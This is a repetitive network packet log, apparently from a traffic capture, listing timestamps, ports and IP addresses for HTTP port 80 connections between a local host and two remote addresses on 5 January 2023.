                                                                                                                                                                                    Jan 5, 2023 08:58:32.857141018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.857209921 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.891293049 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.891388893 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.908710957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.908781052 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.978902102 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.978975058 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979022980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979069948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979103088 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979115009 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979159117 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979161978 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979207993 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979232073 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979254007 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979301929 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979319096 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979348898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979393959 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979413033 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979438066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:32.979500055 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031287909 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031364918 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031414986 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031445026 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031488895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031523943 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031569958 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031601906 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031604052 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031651974 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031733990 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031738043 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031738043 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031780958 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031822920 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031836987 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031868935 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031915903 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031924009 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.031964064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032011986 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032030106 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032052994 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032098055 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032105923 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032145023 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032195091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032197952 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032241106 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032283068 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032296896 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032489061 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032533884 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032552004 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032581091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032618999 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.032634020 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.084800959 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.084887981 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.084937096 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.084940910 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.084983110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085028887 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085031033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085068941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085114002 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085148096 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085159063 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085196972 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085211992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085263014 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085309029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085339069 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085356951 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085366964 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085403919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085452080 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085498095 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085525036 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085536003 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085556030 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085583925 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085622072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085666895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085700989 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085726023 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085730076 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085774899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085819960 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085861921 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085896015 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085906029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085926056 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.085954905 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086000919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086046934 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086071968 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086087942 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086110115 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086133003 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086178064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086225033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086242914 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086268902 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086286068 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086316109 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086358070 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086404085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086429119 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086450100 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086462021 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086497068 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086541891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086587906 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086620092 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086632967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086639881 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086682081 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086760044 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086806059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086841106 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086852074 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086870909 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086899042 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086944103 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.086991072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087023020 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087033033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087042093 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087078094 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087124109 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087162018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087176085 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.087214947 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138358116 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138432980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138483047 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138530016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138552904 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138572931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138592005 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138617992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138668060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138717890 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138787031 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138837099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138843060 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138880014 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138926983 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138964891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.138981104 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139010906 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139012098 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139059067 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139106035 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139152050 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139169931 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139198065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139200926 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139245033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139282942 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139328003 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139336109 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139374971 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139375925 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139422894 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139467955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139472008 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139513969 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139559984 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139564991 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139602900 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139650106 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139688969 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139698029 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139735937 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139755964 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139781952 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139827967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139837980 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139874935 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139915943 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139928102 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.139961004 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140003920 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140010118 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140050888 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140095949 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140141010 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140146017 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140189886 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140192986 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140234947 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140295029 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140341997 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140346050 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140387058 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140389919 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140434980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140479088 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140522957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140537024 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140568972 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140616894 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140618086 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140667915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140717030 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140746117 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140759945 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140791893 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140806913 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140853882 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140901089 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140927076 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140945911 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140959024 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.140995026 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141042948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141088963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141123056 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141135931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141160965 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141182899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141230106 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141278028 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141300917 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141324997 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141343117 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141372919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141416073 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141463041 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141486883 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141510963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141529083 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141556978 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141603947 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141644955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141668081 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141691923 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141705990 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141740084 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141788006 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141835928 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141849995 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141880989 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141896963 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141936064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.141983032 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142028093 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142043114 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142075062 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142101049 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142157078 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142208099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142255068 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142287016 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142307043 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142338991 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142354965 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142389059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142437935 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142482996 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142487049 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142503977 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142529011 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142574072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142617941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142649889 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142663956 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142735958 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142771006 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142780066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142812967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142844915 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142868042 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142950058 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.142997026 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.179753065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.179835081 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.179891109 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:33.179955959 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:33.184261084 CET4974480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:33.189452887 CET4974680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:33.191827059 CET8049737188.114.97.3192.168.2.4
